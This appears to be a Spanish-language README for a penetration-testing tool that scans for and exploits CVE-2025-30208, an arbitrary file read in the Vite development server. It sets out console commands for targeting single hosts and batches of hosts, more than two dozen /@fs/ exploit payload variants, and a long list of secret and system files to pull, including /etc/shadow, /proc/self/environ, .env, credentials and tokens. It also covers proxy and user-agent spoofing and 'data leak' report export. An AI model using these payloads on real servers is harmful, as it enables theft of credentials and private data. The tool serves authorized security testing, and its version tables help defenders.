
CVE‑2025‑30208 es una vulnerabilidad de gravedad media de lectura arbitraria de archivos en el servidor de desarrollo de Vite (una popular herramienta de compilación para frontend)
Escáner de vulnerabilidades avanzado para CVE-2025-30208 con características de nivel empresarial
Herramienta profesional de pruebas de penetración para la detección de la vulnerabilidad de lectura arbitraria de archivos en Vite
🚀 Inicio Rápido • 📋 Características • 🔧 Uso • 📊 Ejemplos • 🛡️ Seguridad
Este es un escáner de vulnerabilidades integral diseñado para detectar y explotar la vulnerabilidad CVE-2025-30208 en los servidores de desarrollo de Vite. La vulnerabilidad permite el acceso de lectura arbitraria de archivos a través de los endpoints del sistema de archivos de Vite, pudiendo exponer archivos de configuración sensibles, código fuente e información del sistema.
La herramienta ahora cuenta con una arquitectura modular para un mejor mantenimiento y extensibilidad:
CVE-2025-30208.py - Aplicación principal del escánerpayloads.py - Payloads avanzados de explotación (más de 60 variaciones)sensitive_files.py - Base de datos integral de archivos sensibles (más de 200 archivos)html_template.py - Plantilla mejorada de informes HTML estilo hackerpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]
CVE-2025-30208 > scan
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Generate beautiful HTML report
CVE-2025-30208 > pull
# Start web server to view report
CVE-2025-30208 > web
# Start web server on specific port
CVE-2025-30208 > web 8081
# Stop web server
CVE-2025-30208 > web off
El escáner ahora utiliza más de 60 variaciones de payloads organizadas en payloads.py:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
La herramienta ahora prueba más de 200 archivos sensibles organizados en sensitive_files.py:
/etc/passwd - Información de cuentas de usuario/etc/shadow - Datos de contraseñas cifradas/etc/services - Servicios de red/etc/hosts - Mapeos de hostnames/etc/fstab - Tabla del sistema de archivos/etc/ssh/sshd_config - Configuración del servidor SSH/etc/crontab - Tareas cron del sistema/etc/sudoers - Configuración de sudo/proc/version - Versión del kernel/proc/cpuinfo - Información de la CPU/proc/meminfo - Información de la memoria/proc/self/environ - Entorno del proceso/proc/self/cmdline - Línea de comandos del proceso/proc/net/tcp - Conexiones TCP/proc/net/udp - Conexiones UDP.env - Variables de entorno.env.local - Entorno local.env.production - Entorno de producciónconfig.json - Configuración de la aplicaciónsettings.json - Ajustes de la aplicaciónapplication.properties - Configuración de Springapplication.yml - Configuración YAMLdatabase.yml - Configuración de la base de datossecrets.json - Gestión de secretospackage.json - Dependencias de Node.jspackage-lock.json - Dependencias bloqueadasyarn.lock - Archivo de bloqueo de Yarnvite.config.js - Configuración de Vitevite.config.ts - Configuración de Vite en TypeScripttsconfig.json - Configuración de TypeScriptwebpack.config.js - Configuración de Webpacknext.config.js - Configuración de Next.jsnuxt.config.js - Configuración de Nuxt.jsangular.json - Configuración de Angularvue.config.js - Configuración de Vue.jsrollup.config.js - Configuración de Rollup.git/config - Configuración de Git.gitignore - Reglas de ignorado de Git.gitattributes - Atributos de Git.gitmodules - Submódulos de Git.git/HEAD - Rama actual.git/logs/HEAD - Registros de Git.git/refs/heads/master - Rama master.git/refs/heads/main - Rama mainREADME.md - Documentación del proyectoCHANGELOG.md - Registro de cambiosLICENSE - Información de la licenciaCONTRIBUTING.md - Guías de contribuciónAUTHORS - Información de los autoresTODO.md - Lista de tareasROADMAP.md - Hoja de ruta de desarrolloDockerfile - Configuración de Dockerdocker-compose.yml - Docker Composedocker-compose.override.yml - Configuración de anulación.dockerignore - Reglas de ignorado de Dockerdocker-compose.prod.yml - Configuración de produccióndocker-compose.dev.yml - Configuración de desarrollonginx.conf - Configuración de Nginxapache2.conf - Configuración de Apachehttpd.conf - Configuración del daemon HTTP.htaccess - Control de acceso de Apacheweb.config - Configuración de IISrobots.txt - Directivas para motores de búsquedasitemap.xml - Estructura del sitiomanifest.json - Manifest de la aplicación websw.js - Service workerfirebase.json - Configuración de Firebasefirebase.rules - Reglas de seguridad de Firebaseboot.ini - Configuración de arranqueautoexec.bat - Script de auto-ejecuciónsystem.ini - Configuración del sistemawin.ini - Configuración de WindowsUsers - Directorios de usuarioWindows - Archivos del sistemaProgram Files - Directorios de aplicacionesSystem - Archivos del sistemaLibrary - Archivos de bibliotecaApplications - Archivos de aplicacionesprivate/etc/hosts - Archivo de hostsprivate/etc/passwd - Cuentas de usuariodatabase.db - Base de datos SQLitedatabase.sqlite - Base de datos SQLitedata.db - Base de datos de datosdump.sql - Volcado de la base de datosschema.sql - Esquema de la base de datosmigrations - Migraciones de la base de datoslogs - Directorio de registroserror.log - Registros de erroresaccess.log - Registros de accesoapp.log - Registros de la aplicacióndebug.log - Registros de depuracióncombined.log - Registros combinadosbackup - Directorio de copias de seguridadbackup.sql - Copia de seguridad de la base de datosbackup.zip - Copia de seguridad comprimidadump - Volcado de datosexport - Exportación de datosauth.json - Configuración de autenticacióncredentials.json - Almacenamiento de credencialeskeys.json - Gestión de clavestokens.json - Almacenamiento de tokensjwt.json - Configuración de JWToauth.json - Configuración de OAuthapi.json - Configuración de APIswagger.json - Documentación de APIopenapi.json - Especificación OpenAPIgraphql.json - Configuración de GraphQLschema.json - Esquema de APIcloudformation.yml - AWS CloudFormationserverless.yml - Configuración Serverlessterraform.tf - Configuración de Terraformkubernetes.yml - Configuración de Kubernetesk8s.yml - Configuración de Kubernetesanalytics.json - Configuración de analíticamonitoring.json - Configuración de monitoreometrics.json - Configuración de métricastelemetry.json - Datos de telemetríaLa herramienta ahora genera hermosos informes HTML estilo hacker con:
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # Main scanner application
├── payloads.py # Advanced exploitation payloads (60+)
├── sensitive_files.py # Sensitive file database (200+)
├── html_template.py # Enhanced HTML reporting template
├── README.md # This documentation
├── requirements.txt # Python dependencies
├── logs/ # Log files directory
├── data_leak.html # Generated HTML reports
├── data_leak.json # Generated JSON reports
└── session.json # Saved session configurations
Agradecemos las contribuciones para mejorar esta herramienta:
payloads.pysensitive_files.pyhtml_template.pyEste proyecto está licenciado únicamente para fines educativos y de pruebas de seguridad autorizadas.
⚠️ Aviso Legal: Esta herramienta está destinada únicamente a fines de pruebas de seguridad autorizadas e investigación. Los usuarios son responsables de asegurarse de contar con la autorización adecuada antes de probar cualquier sistema. Los autores no son responsables del mal uso de esta herramienta.
⭐ Si esta herramienta te fue útil, ¡por favor dale una estrella! ⭐
Hecha con ❤️ para la comunidad de seguridad
| Comando | Descripción | Ejemplo |
|---|
set <option> <value> | Establece opciones de configuración | set RHOST 192.168.1.100 |
show options | Muestra la configuración actual | show options |
edit | Editor interactivo de opciones | edit |
run / exploit | Ejecuta la prueba de vulnerabilidad | run |
batch | Escanea múltiples objetivos por lotes | batch |
scan | Descubre archivos sensibles | scan |
pull | Exporta los resultados a HTML/JSON | pull |
web [on|off|port] | Servidor web para informes HTML | web 8080 |
save | Guarda la configuración de la sesión | save |
load | Carga la configuración de la sesión | load |
test | Prueba la conectividad con el objetivo | test |
validate | Valida la configuración actual | validate |
verbose | Alterna el modo verbose | verbose |
proxy | Configura los ajustes de proxy | proxy |
headers | Establece cabeceras HTTP personalizadas | headers |
rate | Configura el límite de tasa | rate |
log | Muestra la información de registro | log |
help / ? | Muestra la ayuda | help |
exit / quit | Sale de la herramienta | exit |
| Opción | Descripción | Por Defecto | Validación |
|---|
RHOST | Dirección IP/host del objetivo | - | Validación de hostname/IP |
RPORT | Número de puerto del objetivo | - | Rango de puertos (1-65535) |
FILEPATH | Ruta de archivo a probar | etc/passwd | Validación de ruta |
PROXY | URL de proxy HTTP/HTTPS | - | Validación de formato de URL |
VERBOSE | Habilita la salida verbose | false | Validación booleana |
RATE_LIMIT | Retraso entre solicitudes (segundos) | 0.3 | Validación numérica |
THREADS | Número de hilos para el escaneo por lotes | 5 | Validación de entero |
TIMEOUT | Tiempo de espera de solicitud (segundos) | 5 | Validación de entero |
CUSTOM_HEADERS | Cabeceras HTTP personalizadas (JSON) | {} | Validación de formato JSON |
eslint.config.jsprettier.config.js - Configuración de Prettierjest.config.js - Configuración de Jestbabel.config.js - Configuración de Babeltailwind.config.js - Configuración de Tailwind CSS| Archivo | Descripción | Formato |
|---|
data_leak.html | Informe HTML de vulnerabilidades mejorado estilo hacker | HTML |
data_leak.json | Exportación JSON estructurada | JSON |
sensitive_files_discovery.json | Archivos sensibles descubiertos | JSON |
session.json | Configuración de sesión guardada | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | Registros de auditoría detallados | Texto |